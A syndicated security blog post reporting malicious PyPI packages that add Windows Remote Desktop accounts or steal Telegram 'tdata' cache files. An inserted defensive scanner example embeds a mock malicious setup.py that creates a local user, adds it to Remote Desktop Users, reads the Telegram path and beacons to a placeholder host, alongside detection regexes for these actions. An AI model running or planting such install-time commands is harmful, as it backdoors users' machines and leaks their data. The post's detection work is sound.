PyPI Packages Steal Telegram Cache Files, Add Windows Remote Desktop Accounts

This week Sonatype has discovered multiple malicious PyPI packages that either set up new Remote Desktop user accounts on your Windows computer or steal encrypted Telegram data files from your Telegram Desktop client.

These packages were discovered by Sonatype’s automated malware detection system, offered as part of the Nexus platform products, including Nexus Firewall. On further review, we deemed these packages malicious and reported them to PyPI.

The primary packages of interest are:

  • flask-requests-complex
  • php-requests-complex
  • tkinter-message-box

Create Remote Desktop Access Accounts on Windows

Both packages ‘flask-requests-complex’ and ‘php-requests-complex’ contain no description but are certainly named after the popular ‘requests’ module.

Both of these packages contain code that adds a new, attacker-created user account to the “Remote Desktop Users” group on Windows, allowing attackers to RDP into the system at will.

Additionally, the packages were seen making a simple HTTP request to a third-party URL, most likely to notify the threat actor that the attack was successful.

Steals Telegram ‘tdata’ Cache & Settings Files

The ‘tkinter-message-box’ package is yet another example of a malicious package named after ‘tkinter’, Python’s standard interface to a GUI toolkit, that comes without a valid description.

But ‘tkinter-message-box’ contains no UI-related code or message box utility. Instead, it attempts to locate where your Telegram Desktop client stores its ‘tdata’ files.

‘tdata’ files are purported to be encrypted files generated by the Telegram Desktop client to store settings and cache. Although it is unlikely for cache files to contain entire chat histories, they may contain JPG images, videos and other media exchanged via the Telegram app that may temporarily remain on the device.

All of these packages were published by the same PyPI account, ‘ternaryternary’, which has published seven packages in total thus far, nearly all of which seem suspicious.
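The traits described above (a name borrowed from a popular module, an empty description, and install-time code that touches the “Remote Desktop Users” group, the Telegram ‘tdata’ directory or an outbound HTTP beacon) can be turned into a simple pre-install triage check. The following is an added example written for this post, not Sonatype’s detection system or the packages’ own code; the `SAMPLE_SETUP_PY` text is a constructed stand-in, and the popular-name list and indicator patterns are assumptions chosen to match the behaviours the post describes.

```python
import re

# Constructed stand-in for an install-time script mirroring the post's description.
# It is NOT the real package source; "example.invalid" is a placeholder host.
SAMPLE_SETUP_PY = r'''
import os, subprocess, urllib.request
from setuptools import setup
user = "svc_helper"
subprocess.run(["net", "user", user, "placeholder", "/add"])
subprocess.run(["net", "localgroup", "Remote Desktop Users", user, "/add"])
tdata = os.path.join(os.environ["APPDATA"], "Telegram Desktop", "tdata")
urllib.request.urlopen("http://example.invalid/beacon")
setup(name="flask-requests-complex", version="0.1", description="")
'''

# Popular names that typosquats tend to borrow (assumed list, extend as needed).
POPULAR_NAMES = {"requests", "flask", "tkinter", "bs4", "django", "numpy"}

# One regex per behaviour the post attributes to the packages.
INDICATORS = {
    "rdp_group_membership": re.compile(r"Remote Desktop Users", re.I),
    "local_account_creation": re.compile(r"\bnet\b.{0,40}\buser\b.{0,80}/add", re.I | re.S),
    "telegram_tdata_access": re.compile(r"Telegram Desktop|\btdata\b", re.I),
    "install_time_http": re.compile(r"urlopen\(|requests\.(get|post)\(|http\.client", re.I),
}


def lookalike_of(package_name: str) -> list:
    """Popular names embedded in the package name (exact matches are not lookalikes)."""
    norm = package_name.lower().replace("_", "-").replace(".", "-")
    return sorted(p for p in POPULAR_NAMES if p != norm and p in norm)


def scan_source(source: str) -> dict:
    """Map each indicator name to whether it appears in the install-time source."""
    return {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}


def triage(package_name: str, description: str, source: str) -> dict:
    """Combine metadata and source indicators into a single triage verdict."""
    hits = scan_source(source)
    findings = {
        "lookalike_of": lookalike_of(package_name),
        "empty_description": not description.strip(),
        "behaviours": sorted(k for k, v in hits.items() if v),
    }
    # Any install-time behaviour is enough; a lookalike name with no description
    # is suspicious on its own and warrants a manual look before installing.
    findings["suspicious"] = bool(findings["behaviours"]) or (
        bool(findings["lookalike_of"]) and findings["empty_description"])
    return findings


if __name__ == "__main__":
    print(triage("flask-requests-complex", "", SAMPLE_SETUP_PY))
```

In practice the source to scan is the package's `setup.py` (or other install hooks) pulled from its sdist before `pip install` runs it.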

Some packages, such as ‘bs4tools (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/pypi-packages-steal-telegram-cache-files-add-windows-remote-desktop-accounts